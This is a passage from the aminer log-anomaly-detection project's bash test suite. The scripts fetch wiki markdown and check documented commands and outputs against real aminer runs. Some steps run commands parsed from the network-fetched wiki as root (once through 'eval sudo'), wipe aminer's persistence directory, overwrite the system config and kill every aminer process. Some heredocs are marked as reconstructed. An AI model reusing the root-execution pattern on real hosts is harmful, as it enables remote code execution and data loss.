\"-\" \"-\"" >> $LOG # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 15 < $OUT) awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` awk '/^```$/ && ++n == 43, /^```$/ && n++ == 44' < $INPUT | sed '/^```/ d' > $OUT OUT3=`cat $OUT` OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 30." exit_code=$((exit_code | $?)) # 31.) Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "89,94d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 32.) Compare the output with the json between 1st ```json and 46th ```. 
runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 40 $OUT) echo "$OUT1" > $OUT OUT1=$(tail -n 3 $OUT) OUT2=$(head -n 36 $OUT) OUT1="$OUT2 $OUT1" awk '/^```json/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT OUT2=$(tail -n 40 $OUT) echo "$OUT2" > $OUT OUT2=$(tail -n 3 $OUT) OUT3=$(head -n 36 $OUT) OUT2="$OUT3 $OUT2" compareStrings "$OUT1" "$OUT2" "Failed Test in 32." exit_code=$((exit_code | $?)) # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. sed -i -e "55,57d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. awk '/^```bash$/ && ++n == 15, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" OUT1=$(sed -n '2p' < $OUT) $CMD > $OUT IN1=`cat $OUT` # not working, because sets have no real order. #compareStrings "$OUT1" "$IN1" "Failed Test in 34." #exit_code=$((exit_code | $?)) # reset schema to backup. sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_SEQ_DET sudo rm $SEQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki sudo rm aminer_install.sh exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToEntropyDetector.sh000077500000000000000000000130551500476301700262040ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. 
# Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself.
# 1.) Extract the lines between 1st ```yaml and 3rd ``` and store it in CFG_PATH.
# 2.) Replace LogResourceList path with LOG1 in CFG_PATH and the report interval of the ParserCount.
# 3.) Parse the aminer CMD between 4th and 5th ```, replace the CFG_PATH and run it.
# 4.) Compare the first two anomalies with the output between 6th and 7th ``` (without the timestamps)
# 5.) Compare the last anomaly with the output between 8th and 9th ``` (without the timestamps)
# 6.) Parse the cat CMD in the first line between 10th and 11th ```, run it and compare the result with the second line.
# 7.) Extract the lines between 2nd ```yaml and 12th ``` and store it in CFG_PATH.
# 8.) Replace LogResourceList path with LOG2 in CFG_PATH.
# 9.) Parse the aminer CMD between 13th and 14th ```, replace the CFG_PATH and run it.
# 10.) Compare the results of the command with the outputs between 13th and 14th ```.
##################################################################

# Optional first argument: wiki branch to test against (defaults to main).
BRANCH=main
if [ $# -gt 0 ]
then
  BRANCH=$1
fi

# All working files use fixed names under /tmp; two concurrent runs on the
# same host would overwrite each other's files.
INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-EntropyDetector.md
OUT=/tmp/out.txt
LOG1=/tmp/entropy_train.log
LOG2=/tmp/entropy_test.log
CFG_PATH=/tmp/config.yml
TMPFILE1=/tmp/tmpfile1
TMPFILE2=/tmp/tmpfile2

# extract the file from the development branch of the wiki project.
# the second ```python script is searched for.
# Trust boundary: the commands this script runs later (some via sudo) are
# parsed out of the markdown fetched here, so the wiki checkout is trusted
# completely. Clone/checkout errors are silenced; if the clone fails, the cd
# fails too, the cp/checkout below run in the current directory, and the
# final "cd .." moves one level above the original working directory.
git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null
cd logdata-anomaly-miner.wiki 2> /dev/null
git checkout $BRANCH > /dev/null 2>&1
cp files/entropy_train.log $LOG1
cp files/entropy_test.log $LOG2
cd ..

# extract config (1.)
# Take the first ```yaml fenced block of the page (fence lines removed) as the
# aminer config; written through sudo tee.
awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null

# replace LogResourceList (2.)
sed "s?file:///home/ubuntu/entropy/entropy_train.log?file:///${LOG1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null sed "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # parse aminer CMD and run it (3.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="sudo${ADDR[1]}" CMD=$(sed "s?config.yml?$CFG_PATH?g" <<<"$CMD") runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(cat $OUT) # compare results (4.) IN=$(awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 23 && $i -ne 25 && $i -ne 52 && $i -ne 54 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 77 && $i -ne 100 && $i -ne 102 && $i -ne 129 && $i -ne 131 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 134 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 4." cat "$TMPFILE1" echo echo cat "$TMPFILE2" fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # compare last result (5.) IN=$(awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 23 && $i -ne 25 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 2154 && $i -ne 2177 && $i -ne 2179 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 2183 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 5." cat "$TMPFILE1" echo echo cat "$TMPFILE2" exit_code=1 fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # parse cat CMD, run it and compare to the second line (6.) 
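# The 10th/11th ``` block holds a prompt line with a cat command; the text
# after the first '#' is run with sudo (through eval, so the page's quoting
# is honoured) and its stdout is compared with the block's second line. As in
# step 3, the wiki checkout is the trust boundary for what gets executed.
awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < "$INPUT_FILE" | sed '/^```/ d' > "$OUT"
CMD=$(cat "$OUT")
IFS='#' read -ra ADDR <<< "$CMD"
CMD="${ADDR[1]}"
OUTPUT="$(eval sudo $CMD)"
IN="$(tail -n 1 "$OUT")"
compareStrings "$OUTPUT" "$IN" "Failed Test in 6."
exit_code=$((exit_code | $?))

# extract second config (7.)
awk '/^```yaml$/ && ++n == 2, /^```$/' < "$INPUT_FILE" | sed '/^```/ d' | sudo tee "$CFG_PATH" > /dev/null

# replace LogResourceList (8.)
# In-place edit instead of `sed file | sudo tee file`: with the pipe, tee
# truncates the file while sed may still be reading it, so the config could
# end up empty.
sudo sed -i "s?file:///home/ubuntu/demo-detectors/entropy/entropy_test.log?file:///${LOG2}?g" "$CFG_PATH"

# parse aminer CMD and run it (9.)
# Only the first line of the 13th/14th block is the command (read consumes a
# single line); the remaining lines are the expected output used in step 10.
awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < "$INPUT_FILE" | sed '/^```/ d' > "$OUT"
CMD=$(cat "$OUT")
IFS='#' read -ra ADDR <<< "$CMD"
CMD="sudo${ADDR[1]}"
CMD=$(sed "s?config_test.yml?$CFG_PATH?g" <<<"$CMD")
# NOTE(review): the config now points at LOG2 (entropy_test.log) but LOG1 is
# passed to runAminerUntilEnd — confirm which file the helper is meant to
# watch.
runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT"
OUTPUT=$(head -n 29 "$OUT") # skipping ParserCount output from runAminerUntilEndTest.

# compare results (10.)
# Lines are collected with >>; drop leftovers of an aborted earlier run first.
rm -f "$TMPFILE1" "$TMPFILE2"
awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < "$INPUT_FILE" | sed '/^```/ d' > "$OUT"
IN="$(tail -n +2 "$OUT")"
i=0
while IFS= read -r line
do
  if [[ $i -ne 23 && $i -ne 25 ]]; then
    echo "$line" >> "$TMPFILE1"
  fi
  i=$((i + 1))
done <<< "$IN"
i=0
while IFS= read -r line
do
  if [[ $i -ne 23 && $i -ne 25 ]]; then
    echo "$line" >> "$TMPFILE2"
  fi
  i=$((i + 1))
done <<< "$OUTPUT"
cmp --silent "$TMPFILE1" "$TMPFILE2"
res=$?
if [[ $res != 0 ]]; then
  echo "Failed Test in 10."
  cat "$TMPFILE1"
  echo
  cat "$TMPFILE2"
fi
exit_code=$((exit_code | res))

# cleanup of everything this script created
rm "$OUT"
rm "$LOG1"
rm "$LOG2"
rm "$TMPFILE1"
rm "$TMPFILE2"
sudo rm -r logdata-anomaly-miner.wiki
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runHowToMissingMatchPathValueDetector.sh000077500000000000000000000212041500476301700307370ustar00rootroot00000000000000#!/bin/bash
. ./testFunctions.sh

##################################################################
# NOTE: not all outputs were compared!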
# If one output fails all other outputs should be corrected as well!
# Description of the test.
# Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself.
# 1.) Write the config to CFG_PATH from 1st ```yaml to 1st ```.
# 2.) Replace LogResourceList path with LOG in CFG_PATH. Lower the check_interval and realert_interval to proper values.
# 3.) Write log lines from 4th to 5th ``` into LOG and LOG_ALICE and LOG_BOB.
# 4.) Extract the first aminer command between 6th and 7th ```, replace the CFG_PATH and run it.
# 5.) Compare the result with the output between 6th and 7th ```.
# 6.) Extract the CMD between 8th and 9th ```, run it and compare the results to the output.
# 7.) Extract the CMD between 10th and 11th ```, run it and compare the results to the output.
# 8.) Set LearnMode: False in CFG_PATH
# 9.) Extract the second aminer command between 16th and 17th ``` and run it in background.
# 10.) Write LOG_ALICE and LOG_BOB to LOG simultaneously, wait for WAIT_TIME. Repeat 5 times.
# 11.) Compare the results with the outputs between between 20th and 21st ```.
# 12.) Write LOG_BOB to LOG and wait until realert_interval is over and compare the results with the outputs between between 24th and 25th ```.
# 13.) Extract the CMD between 35th and 36th ```, run it and compare the results to the output.
##################################################################
# NOTE(review): the step list above is partly out of date with the code that
# follows: step 2 only rewrites the log path and appends Core.PersistencePeriod,
# step 7 is commented out, step 9 merely removes LOG and step 10 writes a fixed
# set of log lines instead of looping. Keep the list in sync when editing.

# Optional first argument: wiki branch to test against (defaults to main).
BRANCH=main
if [ $# -gt 0 ]
then
  BRANCH=$1
fi

# CFG_PATH is the live system configuration of aminer: this script overwrites
# it and deletes it at the end, so it must only run on a disposable test host.
INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-MissingMatchPathValueDetector.md
OUT=/tmp/out.txt
OUT_AMINER=/tmp/aminer_output.txt
LOG=/tmp/access.log
CFG_PATH=/etc/aminer/config.yml

# extract the file from the development branch of the wiki project.
# the first ```yaml script is searched for.
# Trust boundary: the aminer and shell commands executed below are parsed from
# this checkout, several of them via sudo. Clone/checkout errors are silenced;
# if the clone fails, the cd fails too and the final "cd .." moves one level
# above the original working directory.
git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null
cd logdata-anomaly-miner.wiki 2> /dev/null
git checkout $BRANCH > /dev/null 2>&1
cd ..
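# Start from an empty persistence directory. This wipes every detector state
# of the host's aminer installation, not only what this test creates.
sudo rm -rf /var/lib/aminer/*
exit_code=0

# write config (1.)
# First ```yaml block of the page, fence lines stripped, written through sudo
# because CFG_PATH is the system configuration file.
awk '/^```yaml$/ && ++n == 1, /^```$/' < "$INPUT_FILE" | sed '/^```/ d' | sudo tee "$CFG_PATH" > /dev/null

# adapt config (2.)
# In-place edit instead of `sed file | sudo tee file`: with the pipe, tee
# truncates the file while sed may still be reading it, so the config could
# end up empty.
sudo sed -i "s?file:///var/log/apache2/access.log?file:///${LOG}?g" "$CFG_PATH"
echo "Core.PersistencePeriod: 1" | sudo tee -a "$CFG_PATH" > /dev/null

# write log lines (3.)
# The second line of the 4th/5th ``` block is the alice request; the bob
# variant is derived from it. Only the alice line is written to LOG here.
awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < "$INPUT_FILE" | sed '/^```/ d' > "$OUT"
LOG_ALICE="$(sed -n '2p' < "$OUT")"
LOG_BOB="${LOG_ALICE/alice/bob}"
echo "$LOG_ALICE" > "$LOG"

# extract and run aminer command (4.)
# Strip the shell prompt (everything up to "$ "), then swap the config path
# shown on the page for CFG_PATH. OLD_CFG_PATH assumes the first '/' in the
# command begins that path. The wiki checkout is the trust boundary: the
# resulting command is run as root by the helper.
awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < "$INPUT_FILE" | sed '/^```/ d' > "$OUT"
CMD=$(sed -n '1p' < "$OUT")
CMD=${CMD#*$ }
OLD_CFG_PATH=/${CMD#*/}
AMINER_CMD="${CMD/"$OLD_CFG_PATH"/"$CFG_PATH"}"
runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER"
# NOTE(review): $! is the PID of the last background job; whether
# runAminerUntilEnd leaves one running is defined in testFunctions.sh — confirm.
PID=$!

# compare results (5.)
# The first line of the page block (the command) and of the aminer output
# are dropped before comparing.
IN=$(tail -n +2 "$OUT")
OUTPUT=$(tail -n +2 "$OUT_AMINER")
compareStrings "$IN" "$OUTPUT" "Failed Test in 5."
exit_code=$((exit_code | $?))

# extract and run CMD and compare output (6.)
# Here the prompt is split at '$'; the command after it runs without sudo and
# its output is compared with the block's second line.
awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < "$INPUT_FILE" | sed '/^```/ d' > "$OUT"
CMD="$(sed -n '1p' < "$OUT")"
IFS='$' read -ra ADDR <<< "$CMD"
CMD="${ADDR[1]}"
OUTPUT=$($CMD)
IN="$(sed -n '2p' < "$OUT")"
compareStrings "$IN" "$OUTPUT" "Failed Test in 6."
exit_code=$((exit_code | $?))

# extract and run CMD and compare output (7.) — currently disabled
#awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT_FILE | sed '/^```/ d' > $OUT
#CMD="$(sed -n '1p' < $OUT)"
#IFS='$' read -ra ADDR <<< "$CMD"
#CMD="${ADDR[1]}"
#OUTPUT=$($CMD)
#IN="$(sed -n '2p' < $OUT)"
#compareStrings "$IN" "$OUTPUT" "Failed Test in 7."
#exit_code=$((exit_code | $?))

# set LearnMode False (8.)
# Same in-place edit as in step 2, for the same reason.
sudo sed -i "s/LearnMode: True/LearnMode: False/g" "$CFG_PATH"

# run aminer CMD (9.)
rm "$LOG"

# write log lines (10.)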
# NOTE(review): this listing shows `cat < $LOG` directly followed by log lines
# and an EOT terminator; the original is presumably a heredoc that writes these
# lines into $LOG and the redirection was mangled — verify against the
# upstream file before relying on this copy.
cat < $LOG
::1 - - [18/Jul/2020:20:28:01 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice"
::1 - - [18/Jul/2020:20:28:02 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:03 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice"
::1 - - [18/Jul/2020:20:28:04 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:05 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice"
::1 - - [18/Jul/2020:20:28:06 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:07 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice"
::1 - - [18/Jul/2020:20:28:08 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:09 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:10 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:11 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:12 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:13 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
EOT
# Second aminer run with LearnMode False; the extra "not exit aminer" argument
# is passed to the helper, and $! is read afterwards as the PID to wait for
# (what the helper does with that argument is defined in testFunctions.sh).
runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER" "not exit aminer"
PID=$!

# compare results (11.)
# Whole 20th/21st page block vs. the whole aminer output so far.
awk '/^```$/ && ++n == 20, /^```$/ && n++ == 21' < $INPUT_FILE | sed '/^```/ d' > $OUT
IN=$(cat $OUT)
OUTPUT=$(cat $OUT_AMINER)
compareStrings "$IN" "$OUTPUT" "Failed Test in 11."
exit_code=$((exit_code | $?))

# add data and compare results (12.)
# Only bob requests follow, so alice should be reported as missing.
# (Same reconstructed heredoc layout as above.)
cat < $LOG
::1 - - [18/Jul/2020:20:28:14 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:15 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:16 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:17 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:18 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:19 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:20 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:21 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:22 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:23 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:24 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:25 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:26 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:27 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:28 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:29 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:30 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:31 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:32 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:33 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:34 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:35 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:36 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:37 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:38 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:39 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:40 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:41 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:42 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
::1 - - [18/Jul/2020:20:28:43 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob"
EOT
# Wait until the repositioning file reports the current size of the log
# (polled once per second, at most 20 times), then give aminer 8 more seconds.
# NOTE(review): $LOGFILE and $REP_PATH are not assigned anywhere in this
# script; unless testFunctions.sh exports them, both expand empty and the
# loop degenerates into a fixed 20 s wait — presumably $LOG and the
# RepositioningData path used above were meant.
FILE_SIZE=`stat --printf="%s" $LOGFILE 2> /dev/null`
IN=`cat $REP_PATH 2> /dev/null`
IFS=',' read -ra ADDR <<< "$IN"
CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces
CNTR=0
while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 20 ]]; do
  sleep 1
  IN=`cat $REP_PATH 2> /dev/null`
  IFS=',' read -ra ADDR <<< "$IN"
  CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces
  CNTR=$((++CNTR))
done
sleep 8
# pkill by name stops every aminer process on the host, not just the one
# started by this test.
sudo pkill -x aminer.py
sudo pkill -x aminer
wait $PID
# Only the last four output lines are compared with the 24th/25th block.
awk '/^```$/ && ++n == 24, /^```$/ && n++ == 25' < $INPUT_FILE | sed '/^```/ d' > $OUT
IN=$(cat $OUT)
OUTPUT=$(tail -n 4 $OUT_AMINER)
compareStrings "$IN" "$OUTPUT" "Failed Test in 12."
exit_code=$((exit_code | $?))

# extract command, run it and compare results (13.)
# Prompt split at '$'; the command after it runs unprivileged and its output
# is compared with the block's second line.
awk '/^```$/ && ++n == 35, /^```$/ && n++ == 36' < $INPUT_FILE | sed '/^```/ d' > $OUT
CMD="$(sed -n '1p' < $OUT)"
IFS='$' read -ra ADDR <<< "$CMD"
CMD="${ADDR[1]}"
OUTPUT=$($CMD)
IN="$(sed -n '2p' < $OUT)"
compareStrings "$IN" "$OUTPUT" "Failed Test in 13."
exit_code=$((exit_code | $?))

# cleanup: the wiki checkout and the system config written by this script are
# removed again.
sudo rm -r logdata-anomaly-miner.wiki
sudo rm $CFG_PATH
rm $OUT
rm $LOG
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runJsonDemo.sh000077500000000000000000000017121500476301700236040ustar00rootroot00000000000000#!/bin/bash

# Runs the JSON input demo and fails if its output contains unparsed atoms or
# Python errors. First argument is passed straight through to json-demo.sh.
OUT=/tmp/out.txt
AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/*
# Persistence lives under /tmp/lib; mkdir errors are silenced, so a
# pre-existing /tmp/lib created by another local user is reused and chowned.
sudo mkdir /tmp/lib 2> /dev/null
sudo mkdir /tmp/lib/aminer 2> /dev/null
sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null
sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null
sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null
sudo rm $OUT 2> /dev/null
cp -r ./demo/aminerJsonInputDemo/json_logs /tmp/json_logs
cp -r ./demo/aminerJsonInputDemo/windows_json_logs /tmp/windows_json_logs
# $1 is forwarded unquoted to a script run with sudo.
sudo ./demo/aminerJsonInputDemo/json-demo.sh $1 $OUT
exit_code=$?
# OUTPUT is not used further in this script; the checks below grep the file.
OUTPUT=$(cat $OUT)

# NOTE(review): without -n, sed prints the whole file and then the matched
# range a second time; -n is presumably intended in the three sed calls below.
if grep -Fq "VerboseUnparsedAtomHandler" $OUT; then
  exit_code=1
  sed '/VerboseUnparsedAtomHandler/,$p' $OUT
fi

if grep -Fq "UnicodeDecodeError" $OUT || grep -Fq "Config-Error" $OUT || grep -Fq "Traceback" $OUT; then
  exit_code=1
  sed '/UnicodeDecodeError/,$p' $OUT
  sed '/Config-Error/,$p' $OUT
  sed '/Traceback/,$p' $OUT
fi

sudo rm $OUT
sudo rm -r /tmp/json_logs
sudo rm -r /tmp/windows_json_logs
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runMccabe.sh000077500000000000000000000001311500476301700232320ustar00rootroot00000000000000#!/bin/bash

# Complexity report only: the script always exits 0, so findings are
# informational and never fail the build.
python3 -m flake8 --max-complexity 30 /usr/lib/logdata-anomaly-miner
exit 0
logdata-anomaly-miner-2.8.0/aecid-testsuite/runMypy.sh000077500000000000000000000017501500476301700230260ustar00rootroot00000000000000#!/bin/bash

# Type-checks each aminer package separately; the exit code is the sum of the
# individual mypy exit codes, so any failing package fails the script.
exit_code=0
mypy /usr/lib/logdata-anomaly-miner/aminer/analysis/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional
exit_code=$(($exit_code + $?))
mypy /usr/lib/logdata-anomaly-miner/aminer/events/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional
exit_code=$(($exit_code + $?))
mypy /usr/lib/logdata-anomaly-miner/aminer/input/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional
exit_code=$(($exit_code + $?))
mypy /usr/lib/logdata-anomaly-miner/aminer/parsing/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional
exit_code=$(($exit_code + $?))
mypy /usr/lib/logdata-anomaly-miner/aminer/util/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional
exit_code=$(($exit_code + $?))
mypy /usr/lib/logdata-anomaly-miner/aminer/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional
exit_code=$(($exit_code + $?))
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runOfflineMode.sh000077500000000000000000000046061500476301700242600ustar00rootroot00000000000000#!/bin/bash

# Runs aminer once in offline mode over the integration data and checks that
# every expected "New path(s) detected" report appears in its output.
# Persistence under /tmp/lib as in runJsonDemo.sh (mkdir errors silenced).
sudo mkdir /tmp/lib 2> /dev/null
sudo mkdir /tmp/lib/aminer 2> /dev/null
sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null
sudo rm -r /tmp/lib/aminer/* 2> /dev/null
sudo mkdir /tmp/lib/aminer/log 2> /dev/null
sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null
sudo cp ./integration/offline_mode/data/* /tmp/
exit_code=0

#start aminer
#if the aminer is stuck, Jenkins should fail it after a while.
sudo aminer --config ./integration/offline_mode/offline_mode.yml --offline-mode --from-begin > /tmp/out.txt
OUTPUT=$(cat /tmp/out.txt)

# Each expected report is read into VAR (read -d '' returns non-zero at the
# end of the heredoc, which is expected) and searched as a substring of the
# complete output; a miss prints the expected block and marks the run failed.
# NOTE(review): line breaks and leading whitespace inside these heredocs were
# lost in this listing and are reconstructed here — verify against the
# upstream file, since the substring match is whitespace-sensitive.
read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: a1
['/model/data']
a1
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: b1
['/model/data']
b1
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: c1
['/model/data']
c1
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: z1
['/model/data']
z1
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi

read -r -d '' VAR << END
New path(s) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: a2
['/model/data']
a2
